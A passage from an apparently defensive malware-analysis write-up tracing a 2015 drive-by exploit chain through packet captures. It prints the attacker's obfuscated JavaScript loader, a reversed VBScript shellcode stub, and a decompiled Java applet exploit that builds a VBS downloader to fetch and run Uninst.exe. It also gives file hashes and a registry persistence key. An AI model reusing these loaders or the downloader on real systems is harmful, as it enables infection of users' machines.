1c=5q,O=1c(\\'u\\'+\\'6W\\'+\\'6K\\'+\\'e\\'),1k=\\'%31%32\\'+\\'%33\\'+\\'%34%35%36\\'+\\'%37%38\\',P=\\'%64%6f\\'+\\'%63\\'+\\'%75%6d%65\\'+\\'%6e%74\\',1h=\\'6E\/6D+6x++6w+a\/6v+6y+6A+6l+3E+1Y+1X+1Z\/1W\/1N\/1R+1S\/1U+3I+1T\/2d\/2e+2o+2n+2p+2q\/R\/2s\/2r+2m\/2l+2g+2f\/2h+2i\/2k\/2j+2t\/1E\/1t\/1s\/1u+1v+1r\/1w\/1y\/1n+1p+1q+1o\/1m+1x\/1M+1I+8\/1H+1J\/1K+1z+1L+1G\/28+1F\/\/1A+1B+1C+1D+\/1O\/3F+3D\/4\/+3M+3L+3K+3C+3B+6C+2Z\/3a+3b+3c+2Y+2X\/2T\/2U\/2V+2W\/3d+3e\/3l\/3m+3n\/3o\/3k+3j+3f\/3g+3h\/3i\/2S\/2R\/2B\/2C\/2D+2E\/2A\/2z+2v+2w+2x\/2y\/2F+2G+2N+2O+2P\/2Q\/2M+2L+2H\/2I+2J+2K\/3p+3q\/3W+3X\/\/3Y+3Z+3V+3U+3Q+3R+3S\/3T\/4a\/4b\/4i\/4j\/4k+4l++4h+4g+4c+4d\/4e+4f+3P\/3O\/3x\/3y+3z\/3A\/3w+3v+3r\/3s\/3t\/\/3u\\',Q=\\'%77\\'+\\'%72%69%74\\'+\\'%65\\',W;M 1l(f){b d,i,g,c;b I,T;d=[];g=f.m;i=0;D(i<g){c=f.h(i++);3N(c>>4){j 0:j 1:j 2:j 3:j 4:j 5:j 6:j 7:d[d.m]=f.3J(i-1);C;j 12:j 13:I=f.h(i++);d[d.m]=G[\\'E\\'](((c&3H)<<6)|(I&Y));C;j 14:I=f.h(i++);T=f.h(i++);d[d.m]=G.E(((c&2u)<<12)|((I&Y)<<6)|((T&Y)<<0));C}}r d.X(\\'\\')}b 1i="%39"+"%63"+"%6b"+"%63"+"%6b"+"%63"+"%6b";b J=3G 4m(-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,62,-1,-1,-1,63,52,53,54,55,56,57,58,59,60,61,-1,-1,-1,-1,-1,-1,-1,0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,-1,-1,-1,-1,-1,-1,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,-1,-1,-1,-1,-1);P=O(P);M 1g(f){b H,F,l,A;b i,g,d;g=f.m;i=0;d="";D(i<g){N{H=J[f.h(i++)&x]}D(i<g&&H==-1);o(H==-1)C;N{F=J[f.h(i++)&x]}D(i<g&&F==-1);o(F==-1)C;d+=G.E((H<<2)|((F&1P)>>4));N{l=f.h(i++)&x;o(l==61)r d;l=J[l]}D(i<g&&l==-1);o(l==-1)C;d+=G.E(((F&1Q)<<4)|((l&1V)>>2));N{A=f.h(i++)&x;o(A==61)r d;A=J[A]}D(i<g&&A==-1);o(A==-1)C;d+=G.E(((l&2b)<<6)|A)}r d}M 1j(v,w){b 1a=v.m;b 1f=v[1a-1]&K;Z(b i=0;i<1a;i++){v[i]=G.E(v[i]&x,v[i]>>>8&x,v[i]>>>16&x,v[i]>>>24&x)}o(w){r v.X(\\'\\').2c(0,1f)}2a{r v.X(\\'\\')}}M U(s,w){b g=s.m;b v=[];Z(b i=0;i<g;i+=4){v[i>>2]=s.h(i)|s.h(i+1)<<8|s.h(i+2)<<16|s.h(i+3)<<24}o(w){v[v.m]=g}r v}W=O(1k+1i);M 1e(f,1b){o(f==""){r""}b v=U(f,1d);b k=U(1b,1d);b n=v.m-1;b z=v[n-1],y=v[0],S=6B;b L,e,q=4n.6z(6+52\/(n+1)),B=q*S&K;D(B!=0){e=B>>>2&3;Z(b p=n;p>0;p--){z=v[p-1];L=(z>>>5^y<<2)+(y>>>3^z<<4)^(B^y)+(k[p&3^e]^z);y=v[p]=v[p]-L&K}z=v[n];L=(z>>>5^y<<2)+(y>>>3^z<<4)^(B^y)+(k[p&3^e]^z);y=v[0]=v[0]-L&K;B=B-S&K}r 1j(v,6L)}Q=O(Q);t=\\'6M+6J+6I+6F++6G+6H\/6u+6t\/6g+6h+6i+6c\/6a\/5Z\/66\/67\/68+6j+6k\/6q\/6r+6s+6p+6o\/6O+6m\/6n+\/6N+V+7n\/7u\/7g+7f\/7h\/7i\/7q+7j+7k+7l\/7m\/7s+7t\/n\/+7r+7o+7p+7e+7c\/6V\/7d\/6X\/6U+6T\/6P\/6Q\/\/\/6R+6S\/6Y\/6Z+79+7a\/7b++78\/76+70\/71\/73+5Y+5X\/4R+4S+4T+4Q\/4P\/4L+\/4M+4N+\\'+1h+\\'+4O+4U\/4V+5c+5d+5e+5b+5a+4W\/4X\/4Y\/4Z+4K+4J+\/4u\/4v\/4w\/4x+4t\/4s+4o\/4p\/4q+4r\/4y\/4z\/4G\/4H++4I+4F+4E\/4A\/4B+4C\/4D+5f\/5g+5J+5K+5L\/6\/5I\/5H\/5D+5E\/5F+5G\/5M\/5N\/5U\/5V+5W\/5T+5S\/5O+5P\/5Q+5R+5C+5B+5n++5o\/5p\/5m+5l+5h+5i\/5j\/5k\/e\/5r\/5y\/5z\/5A\/5x\/5w+5s\/5t\/5u\\';t=1l(1e(1g(t),W));5v[P][Q](t);',\r\n            62, 465, xmPpPuD[\r\n                C69df3E3](\r\n                xmPpPub0), 0, {}\r\n        ))\r\n    }\r\n\r\n    function ckl() {\r\n        var bmw;\r\n        bmw = new window['Array'](263,\r\n            275, 275, 271, 217, 206,\r\n            206, 208, 216, 216, 205,\r\n            208, 215, 215, 205, 208,\r\n            207, 213, 205, 208, 213,\r\n            209, 206, 213, 213, 205,\r\n            260, 279, 159, 260);\r\n        return bmw;\r\n    }\r\n\r\n    function ckls() {\r\n        return\r\n            "JB2kHkHkgFPKLKLFmFZFZKwFmF2F2KwFmFgFBKwFmFBFKKLFBFBKwByk2Bygggg";\r\n    }\r\n<\/script>\r\n<script language="javascript" src="http:\/\/count2.51yes.com\/click.aspx?id=25685989&logo=1"\r\ncharset="gb2312"><\/script>\r\n<\/pre>\n
So somewhere in that mess above is the instruction to call another site off this same IP address as seen below:<\/p>\n
\r\nGET \/jquery.js HTTP\/1.1\r\nAccept: *\/*\r\nReferer: http:\/\/199.188.106.162\/index.html\r\nAccept-Language: en-us\r\nUser-Agent: Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident\/4.0)\r\nAccept-Encoding: gzip, deflate\r\nHost: 199.188.106.162\r\nConnection: Keep-Alive\r\n\r\nHTTP\/1.1 200 OK\r\nContent-Length: 19883\r\nContent-Type: application\/x-javascript\r\nLast-Modified: Thu, 17 Sep 2015 11:38:18 GMT\r\nAccept-Ranges: bytes\r\nETag: "108f3d593df1d01:246"\r\nServer: Microsoft-IIS\/6.0\r\nDate: Sun, 20 Sep 2015 12:09:35 GMT\r\n<\/pre>\n
When we look at the “jquery.js” file we can see that this file has more code in it. The interesting thing about this file is that it looks to be doing evaluations of different browsers and what java version is installed\/being used with said browser. Also, the code in the page is looking for certain classid’s which all seem to deal with Internet Explorer and what version of Java is being utilized with IE. But there is one clasid in particular (CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA) which has been explited in the past and has a CVE attached to it. To read more about this, please see these links: http:\/\/www.kb.cert.org\/vuls\/id\/886582\/ and http:\/\/www.greyhathacker.net\/?p=610. I am, once again, reminded of why one should not have Java installed on their system if they can help it. <\/p>\n
We then see within the stream that there is another call to this page:<\/p>\n
\r\nGET \/LjNsSx.html HTTP\/1.1\r\nAccept: image\/gif, image\/jpeg, image\/pjpeg, image\/pjpeg, application\/x-shockwave-flash, *\/*\r\nReferer: http:\/\/199.188.106.162\/index.html\r\nAccept-Language: en-us\r\nUser-Agent: Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident\/4.0)\r\nAccept-Encoding: gzip, deflate\r\nHost: 199.188.106.162\r\nConnection: Keep-Alive\r\n\r\nHTTP\/1.1 200 OK\r\nContent-Length: 16087\r\nContent-Type: text\/html\r\nLast-Modified: Thu, 17 Sep 2015 11:38:18 GMT\r\nAccept-Ranges: bytes\r\nETag: "108f3d593df1d01:246"\r\nServer: Microsoft-IIS\/6.0\r\nDate: Sun, 20 Sep 2015 12:09:35 GMT\r\n<\/pre>\n
The funny thing with this page is the fact that the script starts off backwards:<\/p>\n
\r\n<textarea style='display:none' id='lshdic200Xpage'>>TPIRCS\/<\r\nnoitcnuf dne\r\nfi dne  \r\nfi dne     \r\n)(edomefastontes          \r\n  esle     \r\n                    )(edocllehsnur         \r\n)noisreVtni(etirw.tnemucod         \r\n)"EI >rb<"(etirw.tnemucod         \r\nneht )4<noisreVtni(fi     \r\n\r\n)0(wrhc&)00(wrhc&)76723(wrhc&)00(wrhc&yarraym=yarraym     \r\n)00(wrhc&)00(wrhc&)00(wrhc&)00(wrhc&)00(wrhc&)10(wrhc&)6712(wrhc&)10(wrhc        =yarraym     \r\nnehT eurT=)(etaerC fI  \r\n)(tinInigeB  \r\n\r\n0=x9niw  \r\n\r\nfi dne  \r\n             \r\n  noitcnuf   tixe     \r\nesle  \r\n   ))2 ,5 + )"EISM" ,ofni(rtSnI ,ofni(diM(tnIC = noisreVtni             \r\n neht   )0>)"EISM",ofni(rtsni( fi  \r\n\r\nfi dne  \r\nnoitcnuf   tixe     \r\nneht   )0>)"46niW",ofni(rtsni(fi  \r\n\r\ntnegAresU.rotagivaN=ofni  \r\ntxeN emuseR rorrE nO  \r\n)(nigeB noitcnuf\r\n>"tpircSBV"=EGAUGNAL TPIRCS<<\/textarea>\r\n<\/pre>\n
We now see that the URL mentioned at the end of the index.html page above is now being called as you can see below:<\/p>\n
\r\nGET \/click.aspx?id=25685989&logo=1 HTTP\/1.1\r\nAccept: *\/*\r\nReferer: http:\/\/199.188.106.162\/index.html\r\nAccept-Language: en-us\r\nUser-Agent: Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident\/4.0)\r\nAccept-Encoding: gzip, deflate\r\nHost: count2.51yes.com\r\nConnection: Keep-Alive\r\n\r\nHTTP\/1.1 200 OK\r\nDate: Sun, 20 Sep 2015 12:10:12 GMT\r\nServer: Microsoft-IIS\/6.0\r\nX-Powered-By: ASP.NET\r\nX-AspNet-Version: 1.1.4322\r\nCache-Control: private\r\nContent-Type: text\/html; charset=gb2312\r\nContent-Length: 1773\r\n<\/pre>\n
On this page we can see some more code, but with more “document.write” statements with what looks to be a hidden iframe:<\/p>\n
\r\nfunction y_gVal(iz)\r\n{var endstr=document.cookie.indexOf(";",iz);if(endstr==-1) endstr=document.cookie.length;return document.cookie.substring(iz,endstr);}\r\nfunction y_g(name)\r\n{var arg=name+"=";var alen=arg.length;var clen=document.cookie.length;var i=0;var j;while(i<clen) {j=i+alen;if(document.cookie.substring(i,j)==arg) return y_gVal(j);i=document.cookie.indexOf(" ",i)+1;if(i==0) break;}return null;}\r\nfunction cc_k()\r\n{var y_e=new Date();var y_t=93312000;var yesvisitor=1000*36000;var yesctime=y_e.getTime();y_e.setTime(y_e.getTime()+y_t);var yesiz=document.cookie.indexOf("cck_lasttime");if(yesiz==-1){document.cookie="cck_lasttime="+yesctime+"; expires=" + y_e.toGMTString() +  "; path=\/";document.cookie="cck_count=0; expires=" + y_e.toGMTString() +  "; path=\/";return 0;}else{var y_c1=y_g("cck_lasttime");var y_c2=y_g("cck_count");y_c1=parseInt(y_c1);y_c2=parseInt(y_c2);y_c3=yesctime-y_c1;if(y_c3>yesvisitor){y_c2=y_c2+1;document.cookie="cck_lasttime="+yesctime+"; expires="+y_e.toGMTString()+"; path=\/";document.cookie="cck_count="+y_c2+"; expires="+y_e.toGMTString()+"; path=\/";}return y_c2;}}\r\nvar yesdata;\r\nyesdata='&refe='+escape(document.referrer)+'&location='+escape(document.location)+'&color='+screen.colorDepth+'x&resolution='+screen.width+'x'+screen.height+'&returning='+cc_k()+'&language='+navigator.systemLanguage+'&ua='+escape(navigator.userAgent);\r\ndocument.write('<a href="http:\/\/countt.51yes.com\/index.aspx?id=25685989" target=_blank><img width=20 height=20 border=0 hspace=0 vspace=0 src="http:\/\/count2.51yes.com\/count1.gif" alt="51YES\u00cd\u00f8\u00d5\u00be\u00cd\u00b3\u00bc\u00c6\u00cf\u00b5\u00cd\u00b3"><\/a>');document.write('<iframe MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no src=http:\/\/count2.51yes.com\/sa.htm?id=25685989'+yesdata+' height=0 width=0><\/iframe>'\r\n<\/pre>\n
We then see two calls to ‘count2.51yes.com’ – one is for the ‘count1.gif’ and the other one for the page that we see below. The interesting thing with the page below looks like it is returning information about the system and what page the client is coming from via a GET request and not a POST.<\/p>\n
\r\nGET \/sa.htm?id=25685989&refe=http%3A\/\/www.koreatimes.com\/&location=http%3A\/\/199.188.106.162\/index.html&color=24x&resolution=800x600&returning=0&language=en-us&ua=Mozilla\/4.0%20%28compatible%3B%20MSIE%208.0%3B%20Windows%20NT%205.1%3B%20Trident\/4.0%29 HTTP\/1.1\r\nAccept: image\/gif, image\/jpeg, image\/pjpeg, image\/pjpeg, application\/x-shockwave-flash, *\/*\r\nReferer: http:\/\/199.188.106.162\/index.html\r\nAccept-Language: en-us\r\nUser-Agent: Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident\/4.0)\r\nAccept-Encoding: gzip, deflate\r\nHost: count2.51yes.com\r\nConnection: Keep-Alive\r\n\r\nHTTP\/1.1 200 OK\r\nDate: Sun, 20 Sep 2015 12:10:14 GMT\r\nServer: Microsoft-IIS\/6.0\r\nX-Powered-By: ASP.NET\r\nX-AspNet-Version: 1.1.4322\r\nCache-Control: private\r\nContent-Length: 0\r\n<\/pre>\n
The GET request decoded:<\/p>\n
\r\nGET \/sa.htm?id=25685989&refe=http:\/\/www.koreatimes.com\/&location=http:\/\/199.188.106.162\/index.html&color=24x&resolution=800x600&returning=0&language=en-us&ua=Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident\/4.0) HTTP\/1.1\r\n<\/pre>\n
We now get into the heart of this infection chain. It is here in the next several streams that we start seeing the malicious files being downloaded to the user’s system. The first one up is this one:<\/p>\n
\r\nGET \/66.exe HTTP\/1.1\r\nAccept: *\/*\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident\/4.0)\r\nHost: 199.188.106.162\r\nConnection: Keep-Alive\r\n\r\nHTTP\/1.1 200 OK\r\nContent-Length: 69590\r\nContent-Type: application\/octet-stream\r\nLast-Modified: Sat, 19 Sep 2015 14:32:04 GMT\r\nAccept-Ranges: bytes\r\nETag: "addca2f4e7f2d01:246"\r\nServer: Microsoft-IIS\/6.0\r\nDate: Sun, 20 Sep 2015 12:09:45 GMT\r\n\r\nMZ......................@...............................................!..L.!This program cannot be run in DOS mode.\r\n<\/pre>\n
This file has the following characteristics found on VirusTotal:<\/p>\n
Name: 66.exe
\nMD5 Hash: 65d8e25bab3b1b162196a49401ce98e1
\nFirst submission 2015-09-20 20:27:12 UTC
\nDetection Ratio: 44 \/ 56
\nVirusTotal Link: http:\/\/www.virustotal.com\/en\/file\/871ce05955d90f78580ac13da091d778edae54495f3245651aabece4d65dba38\/analysis\/1444943548\/<\/p>\n
After running this file, I did get the same beaconing as I expected, but I also got some additional changes to the OS and some more files which was captured with regshot. The files that were added to my test VM were:<\/p>\n
Name: xmlUpdater.exe
\nMD5 Hash: 887173f53072cd2d238014f4199b35cf
\nFirst submission  2009-06-28 22:43:21 UTC
\nDetection Ratio: 0 \/ 56
\nVirusTotal Link: http:\/\/www.virustotal.com\/en\/file\/15de06246baae220effc2124ff192bf8a1ee2c82b6d19bed2dd41d6e693be0ed\/analysis\/1445002456\/<\/p>\n
Name: 66.exe
\nMD5 Hash: 1ef8918c407283e8b6519538c8fc260f
\nFirst submission 2015-09-20 23:24:10 UTC
\nDetection Ratio: 44 \/ 56
\nVirusTotal Link: http:\/\/www.virustotal.com\/en\/file\/c8400afee8ef608c648e8a71ecca5118cee73ce48d2aab93156a423c8fb643b1\/analysis\/1445002524\/<\/p>\n
Snippet from regshot (the ReadMe.txt was empty).<\/p>\n
\r\n----------------------------------\r\nValues added: 74\r\n----------------------------------\r\n....\r\nHKU\\S-1-5-21-3862639240-4259269860-3308957193-500\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\EvtMgr: "C:\\windows\\SysWOW64\\rundll32.exe "c:\\laonp\\akzlskv.kla",Compress"\r\n....\r\n----------------------------------\r\nFiles added: 4\r\n----------------------------------\r\nC:\\Users\\Administrator\\AppData\\Local\\Temp\\wireshark_pcapng_C57520F7-185B-4F83-BD7C-5CD3C66C9EA6_20151016055519_a00748\r\nC:\\Users\\Administrator\\Desktop\\xmlUpdater.exe\r\nC:\\laonp\\akzlskv.kla\r\nC:\\laonp\\ReadMe.txt\r\n<\/pre>\n
The next one in the stream grabs the malicious jar file:<\/p>\n
\r\nGET \/YcVoEu.jar HTTP\/1.1\r\naccept-encoding: pack200-gzip, gzip\r\ncontent-type: application\/x-java-archive\r\nUser-Agent: Mozilla\/4.0 (Windows XP 5.1) Java\/1.6.0_10\r\nHost: 199.188.106.162\r\nAccept: text\/html, image\/gif, image\/jpeg, *; q=.2, *\/*; q=.2\r\nConnection: keep-alive\r\n\r\nHTTP\/1.1 200 OK\r\nContent-Length: 2983\r\nContent-Type: application\/java-archive\r\nLast-Modified: Thu, 17 Sep 2015 11:38:18 GMT\r\nAccept-Ranges: bytes\r\nETag: "108f3d593df1d01:246"\r\nServer: Microsoft-IIS\/6.0\r\nDate: Sun, 20 Sep 2015 12:09:47 GMT\r\n<\/pre>\n
When we open this up via Java Decomplier, we get the following code<\/p>\n
\r\nimport java.applet.Applet;\r\nimport javax.script.ScriptEngine;\r\nimport javax.script.ScriptEngineManager;\r\nimport javax.swing.JList;\r\n\r\npublic class regedt32\r\n  extends Applet\r\n{\r\n  private JList list;\r\n  \r\n  public void init()\r\n  {\r\n    try\r\n    {\r\n      Object localObject1 = null;\r\n      Object localObject2 = null;\r\n      \r\n      String str1 = " ############################################################################################################################################################################################################################################@@@@@@@@@@@@@@@@~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~@@ ";\r\n      String str2 = "ess";\r\n      String str3 = "t";\r\n      String str4 = str3 + "y";\r\n      String str5 = "v";\r\n      String str6 = "cu";\r\n      String str7 = ".";\r\n      String str8 = str7 + "e";\r\n      String str9 = "d" + str8;\r\n      String str10 = "cm" + str9 + "xe";\r\n      String str11 = "tS";\r\n      String str12 = "e" + str11;\r\n      String str13 = str12 + "e" + str6;\r\n      String str14 = "te";\r\n      String str15 = "an";\r\n      String str16 = "l" + str15 + "g";\r\n      String str17 = "a." + str16 + ".S";\r\n      String str18 = "v" + str17 + "y";\r\n      String str19 = ".s" + str13 + "r";\r\n      String str20 = "ja" + str18 + "s" + str14 + "m" + str19 + "i" + str4;\r\n      Object localObject3 = null;\r\n      Object localObject4 = null;\r\n      String str21 = getParameter("dota");\r\n      String str22 = "function";\r\n      String str23 = "j";\r\n      String str24 = "return \\"succ" + str2 + "ful\\";};";\r\n      String str25 = "s";\r\n      String str26 = "error.message = this;";\r\n      String str27 = "ts(0)";\r\n      String str28 = "ho UR";\r\n      String str29 = "m=\\"!!!!!!!!!!!!!!M!!i!c!r!o!s!o!f!t!!.!XM!L!H!T!!T!!P!\\"";\r\n      String str30 = "s=\\"%uA%u%uD%uO%uD%uB.%uS%ut%ur%ue%ua%u%um\\"";\r\n      String str31 = "var error = new Error(\\"My error\\");";\r\n      String str32 = "ntime.getRuntime().ex";\r\n      String str33 = "%SystemRoot%\\\\\\\\regedt32.Temp.VbS";\r\n      String str34 = str31 + "this.toString = " + str22 + "(){ " + str20 + "Manager(null);ja" + str5 + "a.la" + "ng.Ru" + str32 + "ec('" + str10 + " \/c ec" + str28 + "L = LCase(WScript.Argumen" + str27 + ")>\\"" + str33 + "\\"&&" + str10 + " \/c echo dim m,s>>\\"" + str33 + "\\"&&" + str10 + " \/c echo " + str29 + ">>\\"" + str33 + "\\"&&" + str10 + " \/c echo " + str30 + " >>\\"" + str33 + "\\"&&" + str10 + " \/c echo set cmd = Createobject(replace(m,\\"!\\",\\"\\")) >>\\"" + str33 + "\\"&&" + str10 + " \/c echo cmd.Open \\"GET\\",URL,0 >>\\"" + str33 + "\\"&&" + str10 + " \/c echo cmd.Send()>>\\"" + str33 + "\\"&&" + str10 + " \/c echo FileName=LCase(WScript.Arguments(1))>>\\"" + str33 + "\\"&&" + str10 + " \/c echo Set CsCriptGet = Createobject(replace(s,\\"%u\\",\\"\\"))>>\\"" + str33 + "\\"&&" + str10 + " \/c echo CsCriptGet.Mode=^3>>\\"" + str33 + "\\"&&" + str10 + " \/c echo CsCriptGet.Type=^1>>\\"" + str33 + "\\"&&" + str10 + " \/c echo CsCriptGet.Open()>>\\"" + str33 + "\\"&&" + str10 + " \/c echo CsCriptGet.Write(cmd.responseBody)>>\\"" + str33 + "\\"&&" + str10 + " \/c echo CsCriptGet.SaveToFile FileName,^2>>\\"" + str33 + "\\"&&" + str10 + " \/c cscript \\"" + str33 + "\\" " + str21 + " \\"%TEMP%\\\\\\\\Uninst.exe\\"&& \\"%TEMP%\\\\\\\\Uninst.exe\\"');" + str24 + str26;\r\n      ScriptEngine localScriptEngine = new ScriptEngineManager().getEngineByExtension(str23 + str25);\r\n      localScriptEngine.eval(str34);\r\n      this.list = new JList(new Object[] { localScriptEngine.get("error") });\r\n      \r\n      add(this.list);\r\n    }\r\n    catch (Exception localException)\r\n    {\r\n      localException.printStackTrace();\r\n    }\r\n  }\r\n}\r\n<\/pre>\n
Plugging away at the variables in the above script I came away with this (after running it through JSBeautify):<\/p>\n
\r\n String str1 =\r\n     " ############################################################################################################################################################################################################################################@@@@@@@@@@@@@@@@~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~@@ ";\r\n String str2 = "ess";\r\n String str3 = "t";\r\n String str4 = t + "y";\r\n String str5 = "v";\r\n String str6 = "cu";\r\n String str7 = ".";\r\n String str8 = . + "e";\r\n String str9 = "d" + .e;\r\n String str10 = "cm" + d.e + "xe";\r\n String str11 = "tS";\r\n String str12 = "e" + tS;\r\n String str13 = etS + "e" + cu;\r\n String str14 = "te";\r\n String str15 = "an";\r\n String str16 = "l" + an + "g";\r\n String str17 = "a." + lang + ".S";\r\n String str18 = "v" + a.lang.s + "y";\r\n String str19 = ".s" + etSecu + "r";\r\n String str20 = "ja" + va.lang.sy + "s" +\r\n     te + "m" + .setSecur + "i" + ty;\r\n Object localObject3 = null;\r\n Object localObject4 = null;\r\n String str21 = getParameter("dota");\r\n String str22 = "function";\r\n String str23 = "j";\r\n String str24 = "return \\"succ" + ess +\r\n     "ful\\";};";\r\n String str25 = "s";\r\n String str26 = "error.message = this;";\r\n String str27 = "ts(0)";\r\n String str28 = "ho UR";\r\n String str29 =\r\n     "m=\\"!!!!!!!!!!!!!!M!!i!c!r!o!s!o!f!t!!.!XM!L!H!T!!T!!P!\\"";\r\n String str30 =\r\n     "s=\\"%uA%u%uD%uO%uD%uB.%uS%ut%ur%ue%ua%u%um\\"";\r\n String str31 =\r\n     "var error = new Error(\\"My error\\");";\r\n String str32 = "ntime.getRuntime().ex";\r\n String str33 =\r\n     "%SystemRoot%\\\\\\\\regedt32.Temp.VbS";\r\n String str34 =\r\n     var error = new Error(\\\r\n             "My error\\") + "\r\n             this.toString =\r\n             " + function + " () {\r\n                 " + str20 + "\r\n                 Manager(null);\r\n                 ja " + v + "\r\n                 a.la " + "\r\n                 ng.Ru " + ntime.getRuntime().ex + "\r\n                 ec(\r\n                     '" + cmd.exe + " \/c ec" + ho UR + "L = LCase(WScript.Argumen" + ts(0) + ")>\\"" + %SystemRoot%\\\\\\\\regedt32.Temp.VbS + "\\"&&" + cmd.exe + " \/c echo dim m,s>>\\"" + %SystemRoot%\\\\\\\\regedt32.Temp.VbS + "\\"&&" + cmd.exe + " \/c echo " + m=\\"!!!!!!!!!!!!!!M!!i!c!r!o!s!o!f!t!!.!XM!L!H!T!!T!!P!\\ + ">>\\"" + %SystemRoot%\\\\\\\\regedt32.Temp.VbS + "\\"&&" + cmd.exe + " \/c echo " + s=\\"%uA%u%uD%uO%uD%uB.%uS%ut%ur%ue%ua%u%um\\ + " >>\\"" + %SystemRoot%\\\\\\\\regedt32.Temp.VbS + "\\"&&" + cmd.exe + " \/c echo set cmd = Createobject(replace(m,\\"!\\",\\"\\")) >>\\"" + %SystemRoot%\\\\\\\\regedt32.Temp.VbS + "\\"&&" + cmd.exe + " \/c echo cmd.Open \\"GET\\",URL,0 >>\\"" + %SystemRoot%\\\\\\\\regedt32.Temp.VbS + "\\"&&" + str10 + " \/c echo cmd.Send()>>\\"" + %SystemRoot%\\\\\\\\regedt32.Temp.VbS + "\\"&&" + str10 + " \/c echo FileName=LCase(WScript.Arguments(1))>>\\"" + %SystemRoot%\\\\\\\\regedt32.Temp.VbS + "\\"&&" + cmd.exe + " \/c echo Set CsCriptGet = Createobject(replace(s,\\"%u\\",\\"\\"))>>\\"" + %SystemRoot%\\\\\\\\regedt32.Temp.VbS + "\\"&&" + cmd.exe + " \/c echo CsCriptGet.Mode=^3>>\\"" + %SystemRoot%\\\\\\\\regedt32.Temp.VbS + "\\"&&" + str10 + " \/c echo CsCriptGet.Type=^1>>\\"" + %SystemRoot%\\\\\\\\regedt32.Temp.VbS + "\\"&&" + str10 + " \/c echo CsCriptGet.Open()>>\\"" + %SystemRoot%\\\\\\\\regedt32.Temp.VbS + "\\"&&" + str10 + " \/c echo CsCriptGet.Write(cmd.responseBody)>>\\"" + %SystemRoot%\\\\\\\\regedt32.Temp.VbS + "\\"&&" + cmd.exe + " \/c echo CsCriptGet.SaveToFile FileName,^2>>\\"" + %SystemRoot%\\\\\\\\regedt32.Temp.VbS + "\\"&&" + cmd.exe + " \/c cscript \\"" + %SystemRoot%\\\\\\\\regedt32.Temp.VbS + "\\" " + getParameter("dota") + " \\"%TEMP%\\\\\\\\Uninst.exe\\"&& \\"%TEMP%\\\\\\\\Uninst.exe\\"'\r\n                 );\r\n                 " + return \\success fully + error.message = this;\r\n                 ScriptEngine localScriptEngine\r\n                     = new ScriptEngineManager()\r\n                     .getEngineByExtension(\r\n                         j + s);\r\n                 localScriptEngine.eval(\r\n                     str34);\r\n                 this.list = new JList(\r\n                     new Object[] {\r\n                         localScriptEngine\r\n                             .get(\r\n                                 "error"\r\n                             )\r\n                     });\r\n<\/pre>\n
This file has the following characteristics found on VirusTotal:<\/p>\n
Name: YcVoEu.jar
\nMD5 Hash: 65f128db98cec269f21f891c97b12ce8
\nFirst submission 2015-09-18 04:22:07 UTC
\nDetection Ratio: 24 \/ 56
\nVirusTotal Link: http:\/\/www.virustotal.com\/en\/file\/07046929cfd6c6ffed93ab5a7b726c085498c1ee076cc476ddaeb2a658075856\/analysis\/1444945396\/
\n**Note: The one thing about this is that VirusTotal has a CVE label for this particular file (http:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2011-3544). I am not sure if this is linked to the one mentioned above or not, but seems to be possibly related. <\/p>\n
I did try to run this within my test VM, but it would not run at all. <\/p>\n
The next couple of pages all return 404 errors as seen below:<\/p>\n
\r\nGET \/com.class HTTP\/1.1\r\nUser-Agent: Mozilla\/4.0 (Windows XP 5.1) Java\/1.6.0_10\r\nHost: 199.188.106.162\r\nAccept: text\/html, image\/gif, image\/jpeg, *; q=.2, *\/*; q=.2\r\nConnection: keep-alive\r\n\r\nHTTP\/1.1 404 Not Found\r\nContent-Length: 1635\r\nContent-Type: text\/html\r\nServer: Microsoft-IIS\/6.0\r\nDate: Sun, 20 Sep 2015 12:09:47 GMT\r\n-----\r\nGET \/edu.class HTTP\/1.1\r\nUser-Agent: Mozilla\/4.0 (Windows XP 5.1) Java\/1.6.0_10\r\nHost: 199.188.106.162\r\nAccept: text\/html, image\/gif, image\/jpeg, *; q=.2, *\/*; q=.2\r\nConnection: keep-alive\r\n\r\nHTTP\/1.1 404 Not Found\r\nContent-Length: 1635\r\nContent-Type: text\/html\r\nServer: Microsoft-IIS\/6.0\r\nDate: Sun, 20 Sep 2015 12:09:47 GMT\r\n-----\r\nGET \/net.class HTTP\/1.1\r\nUser-Agent: Mozilla\/4.0 (Windows XP 5.1) Java\/1.6.0_10\r\nHost: 199.188.106.162\r\nAccept: text\/html, image\/gif, image\/jpeg, *; q=.2, *\/*; q=.2\r\nConnection: keep-alive\r\n\r\nHTTP\/1.1 404 Not Found\r\nContent-Length: 1635\r\nContent-Type: text\/html\r\nServer: Microsoft-IIS\/6.0\r\nDate: Sun, 20 Sep 2015 12:09:47 GMT\r\n-----\r\nGET \/org.class HTTP\/1.1\r\nUser-Agent: Mozilla\/4.0 (Windows XP 5.1) Java\/1.6.0_10\r\nHost: 199.188.106.162\r\nAccept: text\/html, image\/gif, image\/jpeg, *; q=.2, *\/*; q=.2\r\nConnection: keep-alive\r\n\r\nHTTP\/1.1 404 Not Found\r\nContent-Length: 1635\r\nContent-Type: text\/html\r\nServer: Microsoft-IIS\/6.0\r\nDate: Sun, 20 Sep 2015 